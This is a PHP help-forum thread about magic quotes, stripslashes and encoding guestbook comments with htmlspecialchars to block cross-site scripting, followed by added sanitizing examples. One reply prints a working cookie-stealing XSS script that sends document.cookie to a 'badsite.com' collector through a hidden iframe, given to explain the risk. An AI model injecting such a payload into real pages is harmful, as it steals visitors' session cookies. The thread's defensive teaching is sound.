php and quotation marks

castaban

New Member
Sorry guys, I program very little with PHP, I just moved my PHP script here from a different site. I collect user comments in that script and whenever a user types a " or ' it is escaped like \" or \'. It was not happening on my other site. How can I stop this? Part of my script:
$filename = 'guest1.html';
$somecontent = $_POST['Comment'];

$somecontent will contain \'s..
 

xadrieth

New Member
use:

stripslashes();

there is also "addslashes();" if you need to do the opposite.
 

descalzo

Grim Squeaker
Community Support
Free hosting here has what is called 'magic quotes' enabled. Many places have it disabled.

So input from forms has slashes added.

As mentioned, if $input contains your input,

$input = stripslashes( $input ) ;

should get it back to what the user put in.
 

marshian

New Member
Make sure that you check the input if you wish to do such a thing! htmlentities and strip_slashes are very useful!
Pay attention to code injections.
 

castaban

New Member
Thanks guys, very helpful...
Output is written to a flat file, so I don't worry about SQL injection.
 

xav0989

Community Public Relation
Community Support
Just keep it in mind if you ever plan to move to a database! :biggrin:
 

misson

Community Paragon
Community Support
If content from the flat file is ever going to be displayed in an application that parses HTML, you'll need something like the filter functions to prevent HTML injection/XSS.
 

castaban

New Member
Now you are worrying me... The flat file is formatted to be displayed in the browser, of course. The format is like this:
<ul><li>
<B>Comment: </B> User comment entered here via textarea <BR>
</ul>

Are you saying somebody can infect my page using the textarea? If so, help on how to prevent that would be appreciated...
 

descalzo

Grim Squeaker
Community Support
You can use:

$sanitized_input = htmlspecialchars( $user_input ) ;

OR

$sanitized_input = htmlentities( $user_input ) ;

to start with. The second function is stronger and is the one that you should use.
 

misson

Community Paragon
Community Support
HTML injection?

Also known as Cross Site Scripting (XSS). Imagine someone posts the following comment:
Code:
ur |@m3<script type="text/javascript">var bam=document.createElement('iframe');
bam.style.position='absolute';
bam.style.left='-1000px';
bam.style.width='0px';
bam.style.height='0px';
bam.onload=function() { document.body.removeChild(bam); }
bam.src = 'http://badsite.com/collector?u=' +document.location + '&c=' + document.cookie);
document.body.appendChild(bam);
</script>
The poster will get the cookies of anyone who views the page. A knowledgeable coder can even write viral XSS, such as the MySpace worm.
 

castaban

New Member
So I change it to this then:

$somecontent=stripslashes($somecontent);
$somecontent=htmlentities($somecontent);

users can still use quotes, but there will be at least minimum protection, right...
 

misson

Community Paragon
Community Support
If you want your code to work if magic_quotes_gpc is turned off and on other hosts, you can do something like:
PHP:
function sanitize($somecontent) {
    if (get_magic_quotes_gpc()) {
        $somecontent=stripslashes($somecontent);
    }
    return htmlspecialchars($somecontent);
}
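The same idea carried through to the flat file, as an added example rather than code from the thread: it keeps the magic-quotes check from the post above, but guards it with function_exists() because get_magic_quotes_gpc() was removed in PHP 8.0, passes ENT_QUOTES so single quotes are encoded as well (older PHP versions left ' alone by default, which matters if the text ever lands inside an attribute), names the charset explicitly, and writes the entry in the <ul><li> layout castaban described. The file name guest1.html and the $_POST['Comment'] field come from the original post; the sample comment is constructed.

```php
<?php
// Added example for this thread; not the original poster's script.
declare(strict_types=1);

/**
 * Undo magic_quotes_gpc escaping only where that setting is actually active,
 * then encode the text for safe inclusion in HTML body content.
 * get_magic_quotes_gpc() no longer exists on PHP 8, so the call is guarded;
 * on modern PHP the stripslashes() branch simply never runs.
 */
function sanitize(string $comment): string
{
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $comment = stripslashes($comment);
    }
    // ENT_QUOTES: encode both " and '.  ENT_SUBSTITUTE: replace invalid
    // UTF-8 sequences instead of returning an empty string.
    return htmlspecialchars($comment, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build one entry in the flat-file layout quoted in the thread. */
function formatEntry(string $rawComment): string
{
    return "<ul><li>\n<B>Comment: </B> " . sanitize($rawComment) . " <BR>\n</ul>\n";
}

/** Append one entry to the flat file; returns false if the write failed. */
function appendComment(string $filename, string $rawComment): bool
{
    $written = file_put_contents($filename, formatEntry($rawComment), FILE_APPEND | LOCK_EX);
    return $written !== false;
}

// Constructed sample standing in for what a user might type into the textarea:
// quotes survive as text, and the tag is rendered literally instead of executed.
$sample = "I said \"hi\" & it's <script>alert(1)</script>";
echo formatEntry($sample);

// Real request handling, as in the original script but through sanitize().
if (isset($_POST['Comment'])) {
    appendComment('guest1.html', (string) $_POST['Comment']);
}
```

Run from the command line the echo shows the sample with <, >, &, " and ' all turned into entities (&lt;, &gt;, &amp;, &quot;, &#039;), so the browser displays the script tag as text. Note that this encoding is right for text between tags; if a comment were ever placed inside a URL or a JavaScript string, that context needs its own encoding.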
 

descalzo

Grim Squeaker
Community Support
To be even more thorough, one should sanitize # and & by translating them to &#35 (#) and &#38 (&) by something like preg_replace. That will catch some of the more advanced attacks that use hex encoding.
 

misson

Community Paragon
Community Support
To be even more thorough, one should sanitize # and & by translating them to &#35 (#) and &#38 (&) by something like preg_replace. That will catch some of the more advanced attacks that use hex encoding.

The htmlspecialchars and htmlentities functions you mentioned earlier will encode &, at which point the # isn't special. Is there a situation where this is insufficient? Multi-byte strings shouldn't be an issue, since htmlspecialchars and htmlentities default to using latin-1.
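A concrete check of the point made above, added here and not part of the thread: because htmlspecialchars() encodes & first, any entity-looking sequence a user types (decimal or hex) comes out with its ampersand doubled and is displayed as literal text, so a separate # replacement gains nothing. The block also shows the two ways this can be undone by mistake: passing double_encode=false, or applying an extra & replacement after encoding, which corrupts already-encoded output. All inputs are constructed.

```php
<?php
// Added example; not code from the thread.
declare(strict_types=1);

/** Encode text for HTML body content (same flags as the sanitize example). */
function encodeForHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Same call with double_encode=false: existing entities are left untouched. */
function encodeLeavingEntities(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8', false);
}

// Constructed inputs: numeric entities, hex entities, and a plain ampersand.
$inputs = [
    '&#60;script&#62;',    // decimal entities for < and >
    '&#x3C;script&#x3E;',  // hex entities for < and >
    'Tom & Jerry',
];

foreach ($inputs as $in) {
    // Default encoding: & becomes &amp;, so "&#60;" is shown literally.
    // With double_encode=false the user's entities pass through unchanged,
    // which hands control of the decoded characters back to the user.
    printf("%-20s | default: %-28s | double_encode=false: %s\n",
        $in, encodeForHtml($in), encodeLeavingEntities($in));
}

// Wrong order: replacing & after encoding double-encodes the output,
// so "<b>" is displayed to the reader as the text "&lt;b&gt;".
$wrongOrder = str_replace('&', '&#38;', encodeForHtml('<b>'));
echo "after-the-fact & replacement: ", $wrongOrder, "\n";
```

The default form is the one to keep: one encoding pass, applied at output time to the raw text, with & handled by htmlspecialchars() itself. The double_encode=false form and the post-encoding replacement are shown only so the difference is visible.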
 

fretwizz

Member
Now you are worrying me... The flat file is formatted to be displayed in the browser, of course. The format is like this:
<ul><li>
<B>Comment: </B> User comment entered here via textarea <BR>
</ul>

Are you saying somebody can infect my page using the textarea? If so, help on how to prevent that would be appreciated...

Yeah... I'd like to know that myself.
 